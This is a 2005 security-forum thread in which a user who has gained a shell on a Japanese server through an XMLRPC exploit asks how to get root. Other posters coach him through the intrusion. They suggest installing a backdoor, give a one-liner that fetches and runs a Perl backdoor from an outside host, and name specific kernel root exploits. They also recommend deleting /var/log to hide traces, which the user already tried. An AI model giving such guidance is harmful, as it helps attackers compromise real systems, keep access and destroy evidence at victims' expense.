 |
|
 |
 |
|
 |
IT Security and Insecurity Portal |
|
 |
new XMLRPC exploit , i've got the shell , and now.. ? |
 |
 Posted: Thu Jul 07, 2005 2:49 pm |
 |
|
| petitmaitreblanc |
| Regular user |
 |
|
| Joined: Jul 05, 2005 |
| Posts: 18 |
|
|
|
 |
|
 |
|
..use your brain . Yes I did , I did..
=> exploit <=
but , here's the problem : with this exploit , I can do only some uname , ls , pwd etc.. command , not really usely . Usely , only if I want to know some programm version , where I am , the kernel etc.. But , I can do anything with that .
And , If the server is on safe mode , in french we said "DTC" (Dans ton Cul) as "In Your Ass" 
So , ok , actually , on the compromise system , I am only a simple user who can't change repertory .
What can I do ? are they some good things to do ?
(I don't want to break anything , I don't want to make it a deface , It's not interesting , I'd like to know how to get a root acces , for exemple) |
|
|
|
|
| Posted: Thu Jul 07, 2005 3:45 pm |
|
|
| subzero |
| Valuable expert |
 |
|
| Joined: Mar 16, 2005 |
| Posts: 42 |
|
|
|
|
|
|
|
how about wget command.
install backdoor
run local exploit (depend on platform) to gain root access. |
|
|
|
|
| Posted: Thu Jul 07, 2005 4:23 pm |
|
|
| petitmaitreblanc |
| Regular user |
|
|
| Joined: Jul 05, 2005 |
| Posts: 18 |
|
|
|
|
|
|
|
seem to work ,but I am stupid , the compromise post seemed to be japanese , I don't understand anything..
I ll try on another machine
/edit : when I try "rm /var/log/*" I ve no error message , but when I try another "ls /var/log/" , all log are here .
duno why , but , I can do a "more /etc/passwd" , but I can't no a "rm" command . Any idee ? |
|
Last edited by petitmaitreblanc on Thu Jul 07, 2005 4:33 pm; edited 1 time in total |
|
|
|
| Posted: Thu Jul 07, 2005 4:28 pm |
|
|
| subzero |
| Valuable expert |
|
|
| Joined: Mar 16, 2005 |
| Posts: 42 |
|
|
|
|
|
|
|
compromise ?
oohh its the same.. only running on windows xp and jp google.
command are same.. its doesnt affect at all. |
|
|
|
|
| Posted: Thu Jul 07, 2005 7:45 pm |
|
|
| petitmaitreblanc |
| Regular user |
|
|
| Joined: Jul 05, 2005 |
| Posts: 18 |
|
|
|
|
|
|
|
wget dosen't work . I can see all find I want on the system , execute a lot of thing , but can't write anything , and can't get out of the /home/blogdb .
Am I in a jail (chrooted so ?) ? How can I get more rights and get out of the jail ? |
|
|
|
|
| Posted: Fri Jul 08, 2005 9:11 am |
|
|
| KingOfSka |
| Advanced user |
 |
|
| Joined: Mar 13, 2005 |
| Posts: 61 |
|
|
|
|
|
|
|
do a uname -a to see what os is running, then try to find a folder with rw access, usually are the temp one, then upload an exploit for the os or some software installed and gain root  it worked for me |
|
|
|
|
| Posted: Sun Jul 10, 2005 7:21 pm |
|
|
| petitmaitreblanc |
| Regular user |
|
|
| Joined: Jul 05, 2005 |
| Posts: 18 |
|
|
|
|
|
|
|
ok..
A uname -ra gave me that : | Code: | | Linux ********.jp 2.6.7-1.494.2.2smp #1 SMP Tue Aug 3 09:59:49 EDT 2004 i686 i686 i386 GNU/Linux |
So , I search and found local root exploit . I saw that /tmp is on drwxrwxrwx , so it's my first touch..
So if I am in right , the good way is to download from the victim's shell (as user "nobody) my exploit . But , my problem is that I can't upload it by the command : wget -O way.to.exploit /tmp/exp .
This command don't work on the victim .
Anyway , what can i do ? |
|
|
|
|
|
|
|
|
| Posted: Mon Jul 11, 2005 2:42 am |
|
|
| y3dips |
| Valuable expert |
 |
|
| Joined: Feb 25, 2005 |
| Posts: 281 |
| Location: Indonesia |
|
|
|
|
|
|
| KingOfSka wrote: | | do a uname -a to see what os is running, then try to find a folder with rw access, usually are the temp one, then upload an exploit for the os or some software installed and gain root it worked for me |
for specific distro
try cat /etc/issue |
|
_________________
IO::y3dips->new(http://clog.ammar.web.id); |
|
|
|
| Posted: Mon Jul 11, 2005 2:08 pm |
|
|
| subzero |
| Valuable expert |
|
|
| Joined: Mar 16, 2005 |
| Posts: 42 |
|
|
|
|
|
|
|
| Code: | | cd /tmp;wget mydomain.com/perlbackdoor;perl perlbackdoor |
so have no problem.
you cannot delete cause you are not root 
unless u gained root access.. and then u can rm -rf /var/log
;P |
|
|
|
|
| Posted: Fri Jul 15, 2005 2:26 pm |
|
|
| petitmaitreblanc |
| Regular user |
|
|
| Joined: Jul 05, 2005 |
| Posts: 18 |
|
|
|
|
|
|
|
| subzero wrote: | | Code: | | cd /tmp;wget mydomain.com/perlbackdoor;perl perlbackdoor |
so have no problem.
you cannot delete cause you are not root
unless u gained root access.. and then u can rm -rf /var/log
;P |
hum , damn.. didn't find any rooting exploit for fedora core 1 (or , one , but compiling make me a lot of coding errors) . |
|
|
|
|
|
|
|
|
| Posted: Sat Jul 16, 2005 2:17 pm |
|
|
| LINUX |
| Moderator |
|
|
| Joined: May 24, 2004 |
| Posts: 404 |
| Location: Caiman |
|
|
|
|
|
|
| petitmaitreblanc wrote: | ok..
A uname -ra gave me that : | Code: | | Linux ********.jp 2.6.7-1.494.2.2smp #1 SMP Tue Aug 3 09:59:49 EDT 2004 i686 i686 i386 GNU/Linux |
So , I search and found local root exploit . I saw that /tmp is on drwxrwxrwx , so it's my first touch..
So if I am in right , the good way is to download from the victim's shell (as user "nobody) my exploit . But , my problem is that I can't upload it by the command : wget -O way.to.exploit /tmp/exp .
This command don't work on the victim .
Anyway , what can i do ? |
wget not work ? use curl, lynx, GET
2.6.7-1.494.2.2smp > this kernel its possible root by ./krad 2 or 3 - stackgrow2 |
|
|
|
|
|
www.waraxe.us Forum Index -> Newbies corner
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
Discussions
Tools
Content
Info
Membership:
Latest: 
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 219
Members: 0
Total: 219
